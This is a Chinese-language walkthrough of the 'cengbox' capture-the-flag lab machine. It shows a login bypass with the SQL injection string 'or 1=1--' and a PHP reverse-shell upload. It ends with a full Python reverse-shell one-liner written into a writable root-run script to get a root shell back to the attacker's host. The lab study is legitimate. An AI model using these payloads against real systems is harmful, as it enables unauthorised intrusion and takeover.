环境准备

靶机链接：百度网盘 请输入提取码

提取码：phzm

虚拟机网络链接模式：桥接模式

攻击机系统：kali linux 2021.1

信息收集

1.探测目标靶机ip地址

arp-scan -l

2.探测目标开放端口和服务情况

nmap -p- -A -T4 192.168.1.105

3.用gobuster扫描目标网站的目录

gobuster dir -u http://192.168.1.105 -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

用gobusters扫描出一个可利用目录masteradmin

4.再次用gobuster详细扫描masteradmin目录

gobuster dir -u http://192.168.1.105/masteradmin -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

漏洞利用

1.首先我们尝试下是否有注入漏洞

2.发现‘or 1=1--' 可以注入成功 并且登录进去

3.进去之后发现是一个能上传文件的界面，

还是上传我们的php-reverse-shell.php 文件，

发现上传后 看不到反馈 决定抓包看下是否上传成功。

4.抓包后看到提示，让上传一个后缀为ceng的文件，那就把木马改成weiqin.ceng

5.成功上传文件

6.开启监听，拼接路径，触发木马

7.回弹shell成功，发现是一个普通用户

权限提升

1.尝试回弹一个交互式shell ,应该没有python，

用SHELL=bash script -q /dev/null 回弹 ，

发现一个有执行权限的用户cengover。

2.在masteradmin 下面有数据库配置文件 db.php

发现用户名 root 密码 SuperS3cR3TPassw0rd1!

3.登录数据库

4.正常查看数据库信息

5.得到一组用户名密码masteradmin C3ng0v3R00T1!

登录masteradmin用户 虽然是也是普通用户但他在user组里

发现md5check.py 可读可写，值得利用

6.谷歌搜索python reverse shell 将这句话写入md5check.py里

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

将python -c 后面的利用即可因为md5check.py文件本身就是python脚本

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /opt/md5check.py

7.开启监听成功反弹shell 发现是root 成功拿下！！！

总结

以上是生活随笔为你收集整理的cengbox靶机（SQL注入、文件上传漏洞）的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错，欢迎将生活随笔推荐给好友。